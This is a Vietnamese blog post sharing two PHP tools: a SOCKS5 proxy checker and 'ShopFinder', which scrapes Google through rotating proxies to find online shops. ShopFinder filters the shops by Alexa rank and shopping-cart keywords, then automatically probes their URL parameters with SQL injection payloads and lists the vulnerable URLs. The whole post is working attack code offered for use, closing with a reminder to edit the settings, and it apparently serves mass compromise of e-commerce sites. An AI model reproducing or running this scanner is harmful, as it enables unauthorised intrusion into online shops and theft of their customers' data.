Chủ Nhật, 9 tháng 6, 2013

tool search shop by hoangduye

tool search shop by hoangduye

 21:57  zeko sock  4 comments
code check sock trước

Code:
<title>check sock</title>
<form action="" method="POST">
<textarea name="sock" cols="50" rows="20"></textarea>
<input type="submit" value="check" name="submit1" />
</form><br>
<?php
    @set_time_limit(0);
    function get_sock($info)
    {
        preg_match("/[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?:[0-9]?[0-9]?[0-9]?[0-9]?[0-9]?/",$info,$return);
        return $return[0];
    }

    function get_page($url,$proxy)
    {
        $ch=curl_init();
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_PROXY,$proxy);
        curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
        curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
        curl_setopt($ch,CURLOPT_COOKIEFILE,"C:\xampp\htdocs\check\cookie.txt");
        curl_setopt($ch,CURLOPT_COOKIEJAR,"C:\xampp\htdocs\check\cookie.txt");
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_TIMEOUT,5);
        $page=curl_exec($ch);
        curl_close($ch);
        return $page;
    }
    if(isset($_POST["sock"]))
    {
        $sock=explode("\n",$_POST["sock"]);
        $i=0;
        $arrSock = array();
        while($sock[$i]!="")
        {
            $sock[$i]=get_sock(trim($sock[$i]));
            $page=get_page("http://www.google.com.vn/search?q=allinurl:admin.asp?id=",$sock[$i]);
            if($page!="" && strpos($page,"302 Moved")==false)
            {
                echo "<font color='green'>".$sock[$i]."</font><br>";ob_flush();flush();
                array_push($arrSock,$sock[$i]);
            }
            else
            {
                echo "<font color='red'>".$sock[$i]."</font><br>";ob_flush();flush();
            }
            $i++;
        }
        echo "====List sock ok====<br>";
        $x = join("\r\n",$arrSock);
        echo "<textarea rows='10' cols = '20'>".$x."</textarea>";
    }
?>
tool check shop
Code:
<title>ShopFinder v1.0</title>
<form action="" method="POST">
<table>
    <tr><td>List keywords</td><td>List socks</td></tr>
    <tr><td><textarea name="keyword" cols=40 rows=15>google nha'</textarea></td><td><textarea name="sock" cols=40 rows=15>sock nha'</textarea></td></tr>
    <tr><td></td><td><input type="submit" value="start" /></td></tr>
</table>
</form>
<?php

    ######################
    # cac' ham` ho~ tro. #
    ######################
    function getPage($url,$proxy)
    {
        $ch=curl_init();
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

        //sock5
        if($proxy)
        {
            curl_setopt($ch,CURLOPT_PROXY,$proxy);
            curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
            curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
        }

        //user-agent
        $agent = "Mozilla/5.0 (Windows; ?; Windows NT 5.1; *rv:*) Gecko/* Firefox/0.9*";
        curl_setopt($ch,CURLOPT_USERAGENT,$agent);

        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_TIMEOUT,10);
        $page=curl_exec($ch);
        curl_close($ch);
        return $page;
    }
    function getDomain($url)
    {
        $domain = str_replace("http://","",$url);
        $domain = str_replace("www.","",$domain);
        $domain = str_replace(strstr($domain,"/"),"",$domain);
        return $domain;
    }
    function notInStr($arrFilterKeyword,$str)
    {
        foreach($arrFilterKeyword as $filterKeyword)
        {
            if(strpos($str,$filterKeyword))
            {
                return false;
            }
        }
        return true;
    }
    function cleanUpPage($page)
    {
        $ret = htmlentities($page);
        $ret = str_replace("=","vndarkcode",$ret);

        $arr = array("/[\s]/","/http/","/\"/");
        $ret = preg_replace($arr,"",$ret);

        return $ret;
    }
    function filter($link,$rankAlexa,$arrSearch)
    {
        $page=getPage("http://www.alexa.com/search?q=".getDomain($link)."&r=home_home&p=bigtop","");
        $page=str_replace("\n","",$page);
        preg_match("/Alexa[\s]Traffic[\s]Rank:(.*?)\/a\>/",$page,$tmp);
        preg_match("/\"\>(.*)\</",$tmp[1],$result);
        //echo (intval(str_replace(",","",$result[1])));ob_flush();flush();
        if(intval(str_replace(",","",$result[1])) > $rankAlexa || !preg_match("/\d/",str_replace(",","",$result[1])))
            return 0;
        

        $page = htmlentities(getPage($link,""));
        //echo $page;ob_flush();flush();
        if(notInStr($arrSearch,$page))
            return 0;

        return 1;

    }


    #######################
    # cac' ham` thuc. thi #
    #######################
    function getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock)
    {
        $sockUsing = array_pop($arrSock);
        $limit = 200000;
        $arrGoogle = array(
            "google.com",
            "google.ca",
            "google.com.au",
            "google.co.uk",
            "google.fr",
            "google.ch",
            "google.com.vn",
            "google.nl",
            "google.es",
            "google.ie",
            "google.de",
            "google.co.jp"
        );
        
        $arrLink = array();

        foreach($arrGoogle as $google)
        {
            $h = 0;
            while($h < $limit +1)
            {
                $urlGoogle = "http://www.".$google."/search?&q=".$keyword."&start=".$h."&num=100&filter=1&tbs=cpk:1";
                //echo $urlGoogle."<br>";ob_flush();flush();
                $pageGoogle = getPage($urlGoogle,$sockUsing);
                
                if($pageGoogle == "")
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $h = $h - 100;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }
                if(strpos($pageGoogle,"did not match any documents")==true)
                {
                    break;
                }
                if(strpos($pageGoogle,"http://www.".$google."/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $h = $h - 100;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }

                preg_match_all("/href=[\"]http:\/\/(.*?)\"/",$pageGoogle,$line);
                $i=0;
                while($line[1][$i]!="")
                {
                    if(notInStr($arrFilterKeyword,$line[1][$i]) && !in_array(getDomain($line[1][$i]),$arrDomainChecked) && (preg_match("/\?/",$line[1][$i]) || preg_match("/\/(\d+)\//",$line[1][$i])))
                    {
                        array_push($arrLink,"http://".$line[1][$i]);
                        array_push($arrDomainChecked,getDomain($line[1][$i]));
                    }
                    $i++;
                }
                if((!strpos($pageGoogle,"start=".($h+100))))
                {
                    break;
                }
                $h += 100;
            }
        }
        array_push($arrSock,$sockUsing);
        return $arrLink;
    }

    function check_sql_injection($url)
    {
        if(preg_match("/\?/",$url))
        {
            $pos[0]=strpos($url,"&");$i=1;
            while($pos[$i]=strpos($url,"&",$pos[$i-1]+1))
            {
                $i=$i+1;
            }
            $array_url[0]=stripslashes($url."'");$i=1;
            while(!$pos[$i-1]=="")
            {
                $temp2=substr($url,$pos[$i-1]);
                $temp1=substr_replace($url,"'",$pos[$i-1]);
                $array_url[$i]=stripslashes($temp1.$temp2);
                $i=$i+1;
            }
        }
        elseif(preg_match("/\/(\d+)\//",$url))
        {
            $array_url[0]=stripslashes($url."'");
            preg_match_all("/\/(\d+)\//",$url,$result);
            foreach($result[1] as $var)
                array_push($array_url,stripslashes(str_replace($var,$var."'",$url)));
        }

        $i=0;
        while(!$array_url[$i]=="")
        {
            //echo $array_url[$i]."<br>";ob_flush();flush();
            $page = strtolower(cleanUpPage(getPage($array_url[$i],"")));


            if(strpos($page,"sql"))
            {
                return $array_url[$i];
            }
            else
            {
                if($page != strtolower(cleanUpPage(getPage(str_replace("'","",$array_url[$i]),""))))
                {
                    //echo 1;ob_flush();flush();
                    $arrCheck = array(
                    array("%20And%201=0--","%20And%201=1--","%20And%202=2--"),
                    array("%20'%20And%201=0+--+","%20'%20And%201=1+--+","%20'%20And%202=2+--+"),
                    array("%20/*!%20And%201=0*/--","%20/*!%20And%201=1*/--","%20/*!%20And%202=2*/--"),
                    array("%20'/*!%20And%201=0*/+--+","%20'/*!%20And%201=1*/+--+","%20'/*!%20And%202=2*/+--+"));
                    foreach($arrCheck as $check)
                    {
                        $a = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[0],$array_url[$i]),"")));

                        $b = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[1],$array_url[$i]),"")));

                        $c = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[2],$array_url[$i]),"")));
                        
                        $d = 0;
                        for($k=0;$k<=count($a);$k++)
                        {
                            if(($a[$k] != $b[$k]) && ($b[$k] == $c[$k]))
                                $d++;
                        }


                        if($d > 10)
                        {
                            return $array_url[$i];
                        }
                    }
                }
            }

            $i=$i+1;
        }
        return 0;
    }

    function scanDetail($url,$fileType,$arrSock)
    {
        $sockUsing = array_pop($arrSock);
        $keyword="site:".getDomain($url)."+filetype:".$fileType;
        $blackList = array();
        $end=1;
        while($end<=10)
        {
            $urlGoogle="http://www.google.com/search?q=".$keyword."&start=0&num=100";
            $pageGoogle=getPage($urlGoogle,$sockUsing);
            if($pageGoogle == "")
            {
                if($pageGoogle == "")
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $end = $end - 1;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }
            }
            if(strpos($pageGoogle,"did not match any documents")==true)
            {
                break ;
            }
            if(strpos($pageGoogle,"http://www.google.com/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
            {
                if($sockUsing = array_pop($arrSock))
                {
                    $end = $end - 1;
                }
                else
                {
                    exit("nap. them^ sock di");
                }
            }
            preg_match_all("/href=\"http:\/\/(.*?)\"/",$pageGoogle,$line);
            $i=0;
            while($line[1][$i]!="")
            {
                if(!preg_match("/google.com|youtube.com|cache|alexa.com|search\?/",$line[1][$i]))
                {
                    if(!preg_match("/\?/",$line[1][$i]))
                    {
                        preg_match("/\/(.*?)\./",$line[1][$i],$file);
                        $keyword=$keyword."+-".$file[1].".".$filetype;
                    }
                    else
                    {
                        preg_match("/\/(.*?)\./",$line[1][$i],$file);
                        if(!in_array($file[1],$blackList))
                        {
                            $result = check_sql_injection("http://".$line[1][$i]);
                            if($result)
                            {
                                array_push($arrSock,$sockUsing);
                                return $result;
                            }
                            $keyword=$keyword."+-".$file[1].".".$fileType;
                            array_push($blackList,$file[1]);
                        }
                    }
                }
                $i=$i+1;
            }
            if((!strpos($pageGoogle,"start=".($h+100))))
            {
                break;
            }
            $end=$end+1;
        }
        array_push($arrSock,$sockUsing);
        return 0;
    }
    if(isset($_POST["keyword"]) && isset($_POST["sock"]))
    {

        set_time_limit(0);

        // chi? check shop co' so^' rank nho? hon* 5tr
        $rankAlexa = 5000000;

       // cac' keyword can` phai? co' trong page
        $arrSearch = array("price","cart","basket","$","add to");
        

        // trong link co' cac' tu` nay` se~ bi. loai. bo?
        $arrFilterKeyword = array("google","wikipedia.org","youtube.com","alexa.com","yahoo.com","javascript:void","cache","rapidshare.com","mysql.com","php.net","bing.com","msn.com","microsoft.com","union","torrent","live.com","microsofttranslator.com","amazon.com","facebook.com","info.com","Info.com","order+by","..","'","forum","forum.","hack","security","milw0rm.com","exploit","ebay.com","apple.com","blog",".xml","flickr.com",".pdf",".txt","\"",".vn","india",".in",".cn",".kr",".jp",".hk",".hu",".li",".ru","thailand","thai",".tw","taiwan");


        echo "<font color='red'><h3>[+]Shop finder v1.0 code by vndarkcode</h3></font>";ob_flush();flush();
        
        
        $arrSock = explode("\r\n",$_POST["sock"]);
        $arrDomainChecked = array();

        $arrKeyword = explode("\r\n",$_POST["keyword"]);
        
        
        foreach($arrKeyword as $keyword)
        {
            echo "<font color='green'>[+]Checking keyword : ".$keyword."</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Geting links from google</font><br>";ob_flush();flush();
            
            $keyword = ltrim($keyword);
            $keyword = rtrim($keyword);
            $keyword = str_replace(" ","xxx",$keyword);
            $keyword = str_replace("+","xxx",$keyword);
            $keyword = urlencode($keyword);
            $keyword = str_replace("xxx","+",$keyword);

            $arrLink = getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock);
            
            echo "&nbsp;&nbsp;<font color='brown'>[*]Found ".count($arrLink)." shops</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Finding bug shops</font><br>";ob_flush();flush();
            $i = 0;
            foreach($arrLink as $link)
            {
                if(filter($link,$rankAlexa,$arrSearch))
                {
                    $result = check_sql_injection($link);
                    if($result)
                    {
                        echo "&nbsp;&nbsp;<a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
                    }
                    else
                    {
                        $result = scanDetail($link,"php",$arrSock);
                        if($result)
                        {
                            echo "&nbsp;&nbsp;<a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
                        }
                    }
                }
            }

            echo "&nbsp;&nbsp;<font color='brown'>[*]Found ".$i."/".count($arrLink)." bugs shop</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Done</font><br>";ob_flush();flush();
        }
    }

?>
anh em chú ý edit các chỗ màu đỏ nhé
 more »
Đăng ký: Nhận xét (Atom)